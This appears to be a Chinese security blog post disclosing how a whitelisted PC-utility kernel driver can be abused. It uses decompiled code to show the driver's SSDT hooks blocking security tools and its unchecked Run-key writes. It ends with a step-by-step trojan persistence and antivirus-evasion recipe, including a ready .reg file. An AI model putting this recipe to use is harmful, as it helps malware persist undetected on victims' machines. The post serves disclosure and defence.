提醒:本文最后更新于 74 天前,其中某些信息可能已经过时,请谨慎使用!
你似乎正在查看一篇很久远的文章。
为了你这样的访客,我特地保留了我的历史博文。不要笑话过去的我,用温柔的目光看下去吧。

浅谈白利用四

 所谓权力越大,责任越大,驱动中被利用,可能导致的危害也更大,这里举个例子,也希望大家在写驱动的时候,除了完成功能外,也要考虑到是否有被恶意利用的可能。

MD5 746994da30a10488d090d95f28611e6f

pcmastercoredrv.sys 魔方电脑大师核心驱动程序

1,  挂钩 ZwOpenProcess,ZwTerminateProcess,禁止360,金山,腾讯,打开其进程,可能导致加速球类无法优化关闭其进程。、

2,  等WINLOGON起来后,读取注册表内的指定路径,写入RUN项,开机启动,没有任何验证,导致可被木马利用,随意加载启动项。
目前360已将该驱动清出白名单,但不清除其他杀软是否还在白名单里。 

NTSTATUS __stdcall start(PDRIVER_OBJECTDriverObject, int a2)
{
  NTSTATUS result; // eax@2
  PVOID v3; // eax@6
  PVOID v4; // edx@6
  signed int i; // [sp+0h] [bp-30h]@3
  HANDLE Handle; // [sp+8h] [bp-28h]@8
  UNICODE_STRING SymbolicLinkName; //[sp+Ch] [bp-24h]@6
  NTSTATUS status; // [sp+18h][bp-18h]@1
  PDEVICE_OBJECT DeviceObject; //[sp+1Ch] [bp-14h]@1
  UNICODE_STRING DestinationString; //[sp+24h] [bp-Ch]@1
  PVOID DeviceExtension; // [sp+2Ch][bp-4h]@6
 
 RtlInitUnicodeString(&DestinationString, L"\\Device\\PCMasterCoreDrv");
  status =IoCreateDevice(DriverObject, 0x24u, &DestinationString, 0x22u, 0, 0,&DeviceObject);
  if ( status >= 0 )
  {
    for ( i = 0; i < 27;++i )
     DriverObject->MajorFunction[i] = (PDRIVER_DISPATCH)Generaldispatch;
   DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)DispatchCreate;
   DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)DispatchClose;
    DriverObject->MajorFunction[14]= (PDRIVER_DISPATCH)DispatchIoControl;
   DriverObject->DriverUnload = (PDRIVER_UNLOAD)DrvUnload;
    DeviceExtension =DeviceObject->DeviceExtension;
    *(_DWORD*)DeviceExtension = DeviceObject;
    v3 = DeviceExtension;
    *((_DWORD*)DeviceExtension + 1) = *(_DWORD *)&DestinationString;
    *((_DWORD *)v3 + 2) =DestinationString.Buffer;
    *((_DWORD*)DeviceExtension + 5) = 0;
    *((_BYTE*)DeviceExtension + 24) = 1;
    *((_DWORD*)DeviceExtension + 7) = 1;
    *((_DWORD*)DeviceExtension + 8) = 0;
   LogInit("===pDeviceExtension->StartupLogFinished = true\r\n");
   RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\PCMasterCoreDrv");
    v4 = DeviceExtension;
    *((_DWORD*)DeviceExtension + 3) = *(_DWORD *)&SymbolicLinkName;
    *((_DWORD *)v4 + 4) =SymbolicLinkName.Buffer;
    status =IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
    if ( status >= 0 )
    {
      HookOpenTerminateProcess();
      status =PsCreateSystemThread(&Handle, 0, 0, 0, 0, (PKSTART_ROUTINE)WartForWinLogonThread, DriverObject);
      if ( status< 0 )
       sub_115C0(L"===Reg CreateThread WartForWinLogon Failed!\n");
      status =PsCreateSystemThread(&Handle, 0, 0, 0, 0,(PKSTART_ROUTINE)LogProcessCPUUsageThread, DriverObject);
     ZwClose(Handle);
      result =status;
    }
    else
    {
     IoDeleteDevice(DeviceObject);
      result =status;
    }
  }
  else
  {
    result = status;
  }
  return result;
}
char __cdecl HookOpenTerminateProcess()
{
  char result; // al@2
  signed int v1; // eax@7
  ULONG MajorVersion; // [sp+0h][bp-18h]@3
  char v3; // [sp+Bh] [bp-Dh]@1
  __int16 v4; // [sp+Ch] [bp-Ch]@1
  ULONG MinorVersion; // [sp+10h][bp-8h]@3
  ULONG BuildNumber; // [sp+14h][bp-4h]@3
 
  v3 = 1;
  v4 = 0;
  if ( CheckSsdtHook() )
  {
    result = 1;
  }
  else
  {
   PsGetVersion(&MajorVersion, &MinorVersion, &BuildNumber, 0);
    if ( MajorVersion == 5&& MinorVersion == 1 || MajorVersion >= 6 && MinorVersion>= 1 )
    {
      v1 = MapKeServiceDescriptorTable();
      v3 = v1>= 0;
      if ( v1>= 0 )
      {
        OldZwOpenProcess = (int (__stdcall *)(_DWORD, _DWORD, _DWORD,_DWORD))_InterlockedExchange(
                                                                               (signed __int32 *)BaseAddressKeServiceDescriptorTable
                                                                             + *(_DWORD *)((char *)&ZwOpenProcess + 1),
                                                                               (signed __int32)MyZwOpenProcess);
       OldZwTerminateProcess = (int (__stdcall *)(_DWORD,_DWORD))_InterlockedExchange(
                                                                    (signed__int32 *)BaseAddressKeServiceDescriptorTable
                                                                  + *(_DWORD *)((char *)&ZwTerminateProcess + 1),
                                                                    (signed __int32)MyZwTerminateProcess);
       bHookFlag = 1;
      }
    }
    result = v3;
  }
  return result;
}
unsigned int __stdcallMyZwOpenProcess(HANDLE *a1, int a2, int a3, int a4)
{
  unsigned int result; // eax@14
  __int64 v5; // [sp+0h] [bp-18h]@4
  int v6; // [sp+8h] [bp-10h]@1
  PEPROCESS v7; // [sp+Ch] [bp-Ch]@4
  PVOID Object; // [sp+10h] [bp-8h]@1
  char *v9; // [sp+14h] [bp-4h]@6
 
  Object = 0;
  v6 =OldZwOpenProcess(a1, a2, a3, a4);
  if ( v6 >= 0
   && a1
   && ObReferenceObjectByHandle(*a1, 1u, 0, 0, &Object, 0) >= 0
   && (v5 = (unsigned int)PsGetProcessId(Object), v7 =IoGetCurrentProcess(), (PVOID)v7 != Object)
   && sub_138C0(v5) != -1
   && (v9 = (char *)PsGetProcessImageFileName(v7), stricmp(v9,"lsass.exe"))
   && stricmp(v9, "csrss.exe") )
  {
    if (!stricmp(v9, "kxetray.exe")
     || !stricmp(v9, "QQPCRealTimeSpeedup.exe")
     || !stricmp(v9, "QQPCTray.exe")
     || !stricmp(v9, "360Tray.exe") )
     *a1 = 0;
    result= 0xC0000022u;
  }
  else
  {
    result = v6;
  }
  return result;
}
int __stdcall MyZwTerminateProcess(HANDLEHandle, int a2)
{
  int result; // eax@8
  __int64 v3; // [sp+0h] [bp-18h]@2
  PEPROCESS CurrentProcess; // [sp+Ch][bp-Ch]@2
  PVOID Object; // [sp+10h] [bp-8h]@1
  char *ImageFileName; // [sp+14h][bp-4h]@4
 
  if ( ObReferenceObjectByHandle(Handle,1u, 0, 0, &Object, 0) < 0
    || (v3 =PsGetProcessId(Object), CurrentProcess = IoGetCurrentProcess(),(PVOID)CurrentProcess == Object)
    || sub_138C0(v3) == -1 )
  {
    result =OldZwTerminateProcess(Handle, a2);
  }
  else
  {
    ImageFileName= (char *)PsGetProcessImageFileName(CurrentProcess);
    if (stricmp(ImageFileName, "kxetray.exe") &&stricmp(ImageFileName, "QQPCRealTimeSpeedup.exe") )
    {
     if ( stricmp(ImageFileName, "QQPCTray.exe") )
       stricmp(ImageFileName, "360Tray.exe");
    }
   ObfDereferenceObject(Object);
    result= 0xC0000022u;
  }
  return result;
}
void __stdcall WartForWinLogonThread(inta1)
{
  char v1; // [sp+3h] [bp-19h]@1
  UNICODE_STRING DestinationString; //[sp+4h] [bp-18h]@8
  PVOID j; // [sp+Ch] [bp-10h]@6
  NTSTATUS i; // [sp+10h] [bp-Ch]@2
  SIZE_T SystemInformationLength; //[sp+14h] [bp-8h]@1
  PVOID P; // [sp+18h] [bp-4h]@1
 
  SystemInformationLength = 0x100000u;
  P = 0;
  v1 = 0;
  WriteLog(L"===Reg Begin of WartForWinLogon\n");
  while ( 1 )
  {
    P =ExAllocatePool(PagedPool, SystemInformationLength);
    for ( i =ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P,SystemInformationLength, 0);
         i == 0xC0000004;
         i = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, P,SystemInformationLength, 0) )
    {
     SystemInformationLength += 0x100000u;
     ExFreePoolWithTag(P, 0);
      P =ExAllocatePool(PagedPool, SystemInformationLength);
    }
    if ( i < 0 )
      break;
    for ( j = P; ; j = (char*)j + *(_DWORD *)j )
    {
      if (*((_DWORD *)j + 17) )
      {
       RtlInitUnicodeString(&DestinationString, L"winlogon.exe");
       if ( RtlEqualUnicodeString((PCUNICODE_STRING)j + 7, &DestinationString, 1u))
         break;
      }
      if (!*(_DWORD *)j )
       goto LABEL_12;
    }
    v1 = 1;
    WritePcMasterRegRun();
LABEL_12:
    ExFreePoolWithTag(P, 0);
    if ( v1 )
      break;
    Sleep(100);
  }
  PsTerminateSystemThread(0);
  WriteLog(L"===Reg End ofWartForWinLogon\n");
}
 
void __cdecl WritePcMasterRegRun()
{
  signed int v0; // [sp+0h] [bp-18h]@1
  signed int v1; // [sp+4h] [bp-14h]@1
  int v2; // [sp+8h] [bp-10h]@1
  PCWSTR SourceString; // [sp+Ch][bp-Ch]@1
  int v4; // [sp+10h] [bp-8h]@1
  PVOID P; // [sp+14h] [bp-4h]@1
 
  v4 = 0;
  v1 = 1;
  v0 = 1;
  P = 0;
  v2 = 0;
  SourceString = L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster";
  WriteLog(L"===Reg Begin ofWriteRegRun\n");
  if ( ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster",L"pcmas", 4, &P, (size_t *)&v2) )
  {
    v4 = *(_BYTE *)P;
    ExFreePoolWithTag(P,0x70726567u);
  }
  if ( ReadRegValue(SourceString,L"st", 4, &P, (size_t *)&v2) )
  {
    v1 = *(_BYTE *)P;
    ExFreePoolWithTag(P,0x70726567u);
  }
  if ( v1 == 1 )
  {
    WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_Tray\n");
    WriteRegRun(L"pcmaster",(int)L"pcmastertray.exe", (int)L"/autostart");
  }
  else
  {
    if ( !v4 )
    {
     WriteLog(L"===Reg WriteRegRun_DelRegRun\n");
     sub_14F20(L"pcmaster");
    }
  }
  if ( ReadRegValue(SourceString,L"swg", 4, &P, (size_t *)&v2) )
  {
    v0 = *(_BYTE *)P;
    ExFreePoolWithTag(P,0x70726567u);
  }
  if ( v0 == 1 )
  {
    WriteLog(L"===RegWriteRegRun_ReadRegValue_Startup_WG\n");
    WriteRegRun(L"winguard",(int)L"winguard.exe", (int)L"/autostart");
  }
}
int __stdcall WriteRegRun(PCWSTRSourceString, int a2, int a3)
{
  UNICODE_STRING DestinationString; //[sp+0h] [bp-1040h]@2
  NTSTATUS v5; // [sp+8h] [bp-1038h]@2
  UNICODE_STRING ValueName; // [sp+Ch][bp-1034h]@5
  int v7; // [sp+14h] [bp-102Ch]@1
  OBJECT_ATTRIBUTES ObjectAttributes;// [sp+18h] [bp-1028h]@2
  HANDLE Handle; // [sp+30h][bp-1010h]@1
  PVOID P; // [sp+34h] [bp-100Ch]@1
  int v11; // [sp+38h] [bp-1008h]@1
  ULONG DataSize; // [sp+3Ch][bp-1004h]@1
  wchar_t Data; // [sp+40h][bp-1000h]@1
  char v14; // [sp+42h] [bp-FFEh]@1
 
  Handle = 0;
  P = 0;
  v7 = 0;
  v11 = (int)L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster";
  Data = 0;
  memset(&v14, 0, 0xFFEu);
  DataSize = 0;
  WriteLog(L"===Reg Begin ofWriteRegRun\n");
  if (ReadRegValue(L"\\Registry\\Machine\\SOFTWARE\\RuanMei\\PCMaster",L"Install_Dir", 1, &P, (size_t *)&v7) )
  {
    sub_15310(&Data,2048, L"\"");
    sub_15310(&Data,2048, P);
    ExFreePoolWithTag(P,0x70726567u);
    RtlInitUnicodeString(&DestinationString,L"\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
    ObjectAttributes.Length= 24;
   ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.Attributes= 64;
   ObjectAttributes.ObjectName = &DestinationString;
   ObjectAttributes.SecurityDescriptor = 0;
   ObjectAttributes.SecurityQualityOfService = 0;
    v5 =ZwOpenKey(&Handle, 0xF003Fu, &ObjectAttributes);
    if ( v5 >= 0 )
    {
      sub_15310(&Data,2048, a2);
     sub_15310(&Data, 2048, L"\"");
      if ( a3 )
      {
       sub_15310(&Data, 2048, L" ");
       sub_15310(&Data, 2048, a3);
      }
      DataSize = 2* wcslen(&Data) + 2;
     RtlInitUnicodeString(&ValueName, SourceString);
      v5 = ZwSetValueKey(Handle, &ValueName, 0, 1u,&Data, DataSize);
     ZwClose(Handle);
    }
  }
  WriteLog(L"===Reg End ofWriteRegRun\n");
  return 0;
}

木马只需将自己的可执行文件,放在C盘根目录下,改名为pcmastertray.exe,或winguard.exe,并导入如下注册表,等自己程序起来后,删除注册表,则所有杀软查杀均无法查杀到,而该驱动在开机的时候,在WINLOGON起来之后,会自动将启动项写入注册表。由于写入是在驱动的SYSTEM 线程中,一般杀软不会拦截。

Windows Registry Editor Version 5.00
 
[HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\RuanMei\PCMaster]
"pcmas"=dword:00000001
"st"=dword:00000001
"Install_Dir"="c:\\"

发表评论

共有 0 条看法